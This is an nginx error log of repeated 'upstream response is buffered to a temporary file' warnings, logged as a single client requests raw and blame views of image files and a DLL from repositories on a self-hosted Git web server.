2026/02/17 14:21:03 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/24/0000014242 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png"
2026/02/17 14:21:06 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/24/0000014243 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png"
2026/02/17 14:21:08 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/24/0000014244 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html"
2026/02/17 14:21:18 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/24/0000014245 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png"
2026/02/17 14:21:25 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/24/0000014246 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png"
2026/02/17 14:21:32 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/24/0000014247 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png"
2026/02/17 14:21:39 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/24/0000014248 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png"
2026/02/17 14:23:36 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/24/0000014249 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll"
2026/02/17 14:25:26 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/25/0000014250 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libssl-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libssl-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libssl-3-x64.dll"
2026/02/17 14:25:56 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/25/0000014251 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libssl-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libssl-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libssl-3-x64.dll"
2026/02/17 14:27:57 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/25/0000014252 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html"
2026/02/17 14:27:59 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/25/0000014253 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html"
2026/02/17 14:28:45 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/25/0000014254 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=split&whitespace=ignore-change HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=split&whitespace=ignore-change", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=split&whitespace=show-all"
2026/02/17 14:31:21 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/25/0000014255 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.html"
2026/02/17 14:31:31 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/25/0000014256 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom5.png"
2026/02/17 14:31:38 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/25/0000014257 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png"
2026/02/17 14:31:46 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/25/0000014258 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png"
2026/02/17 14:31:52 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/25/0000014259 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom4.png"
2026/02/17 14:31:59 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/26/0000014260 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom6.png"
2026/02/17 14:32:03 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/26/0000014261 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png"
2026/02/17 14:32:09 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/26/0000014262 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom1.png"
2026/02/17 14:33:21 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/26/0000014263 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png"
2026/02/17 14:33:29 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/26/0000014264 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png"
2026/02/17 14:33:38 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/26/0000014265 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png"
2026/02/17 14:33:46 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/26/0000014266 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png"
2026/02/17 14:33:53 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/26/0000014267 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom6.png"
2026/02/17 14:34:00 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/26/0000014268 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom4.png"
2026/02/17 14:34:06 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/26/0000014269 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom5.png"
2026/02/17 14:34:14 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/27/0000014270 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom1.png"
2026/02/17 14:34:16 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/27/0000014271 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png"
2026/02/17 14:36:09 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/27/0000014272 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html"
2026/02/17 14:36:16 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/27/0000014273 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png"
2026/02/17 14:36:22 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/27/0000014274 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png"
2026/02/17 14:36:31 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/27/0000014275 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png"
2026/02/17 14:36:34 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/27/0000014276 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html"
2026/02/17 14:36:40 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/27/0000014277 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png"
2026/02/17 14:36:48 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/27/0000014278 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png"
2026/02/17 14:36:55 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/27/0000014279 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png"
2026/02/17 14:37:04 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/28/0000014280 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png"
2026/02/17 14:37:17 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/28/0000014281 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png"
2026/02/17 14:37:24 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/28/0000014282 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png"
